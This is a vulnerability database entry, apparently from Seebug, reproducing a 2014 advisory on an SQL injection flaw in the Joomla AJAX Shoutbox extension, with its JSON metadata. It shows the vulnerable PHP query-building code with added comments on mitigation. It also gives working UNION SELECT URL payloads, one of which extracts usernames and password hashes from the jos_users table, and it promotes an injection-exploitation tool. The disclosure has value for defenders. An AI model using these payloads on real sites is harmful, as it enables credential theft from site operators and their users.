ID SSV:85625 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
###################################################################################
Joomla AJAX Shoutbox remote SQL Injection vulnerability
[-] Author: Ibrahim Raafat
[-] Contact: https://twitter.com/RaafatSEC
[-] Discovery date: 1 April 2010 [ 4 years ago ]
[-] Reported to vendor: 12 March 2014
[-] Response: Quick response from the developer; patched and released version 1.7 on the same day
[-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43
[+] Details:
[-] include "helper.php";
[-] parameter: jal_lastID
[-] Code:
// Vulnerable pattern as shipped in <= 1.6 (the advisory reports 1.7 as the patched release):
// the request parameter is read with getVar() and is never cast or validated as an
// integer before it is used.
113 $jal_lastID = JRequest::getVar( 'jal_lastID', 0 );
114
// The raw value is concatenated, unquoted and unescaped, into the WHERE clause, so any
// input other than a plain number changes the statement itself. Mitigation: read it as
// an integer (JRequest::getInt('jal_lastID', 0)) or cast with (int) before building the
// query, and treat a non-numeric value for this parameter as a request worth logging.
115 $query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';
[-] Exploit:
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -
Example:
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -
[+] An amazing tool to discover and exploit SQL Injection vulnerability [ Sculptor - sculptordev.com ]
Founded by https://twitter.com/MSM_1st
###################################################################################
{"href": "https://www.seebug.org/vuldb/ssvid-85625", "status": "poc", "history": [], "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Joomla AJAX Shoutbox <= 1.6 - Remote SQL Injection Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-85625", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2014-07-01T00:00:00", "sourceData": "\n ###################################################################################\r\nJoomla AJAX Shoutbox remote SQL Injection vulnerability\r\n\r\n[-] Author: Ibrahim Raafat\r\n[-] Contact: https://twitter.com/RaafatSEC\r\n[-] Discovery date: 1 April 2010 [ 4 years ago ]\r\n[-] Reported to vendor : 12 March 2014\r\n[-] Response: Quick response from the developer, Patched and released version 1.7 in the same day\r\n[-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43\r\n\r\n[+] Details:\r\n[-] include "helper.php";\r\n[-] parameter: jal_lastID\r\n[-] Code: \r\n113\t$jal_lastID = JRequest::getVar( 'jal_lastID',\t\t0\t\t );\r\n114\r\n115\t$query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' 
ORDER BY id DESC';\r\n\r\n[-] Exploit: \r\n?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -\r\n\r\nExample:\r\n?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -\r\n\r\n[+] An amazing tool to discover and exploit SQL Injection vulnerability [ Sculptor - sculptordev.com ]\r\nFounded by https://twitter.com/MSM_1st\r\n\r\n###################################################################################\r\n\r\n\r\n\n ", "id": "SSV:85625", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T15:20:18", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2017-11-19T15:20:18"}, "dependencies": {"references": [], "modified": "2017-11-19T15:20:18"}, "vulnersScore": 0.3}, "objectVersion": "1.4", "references": []}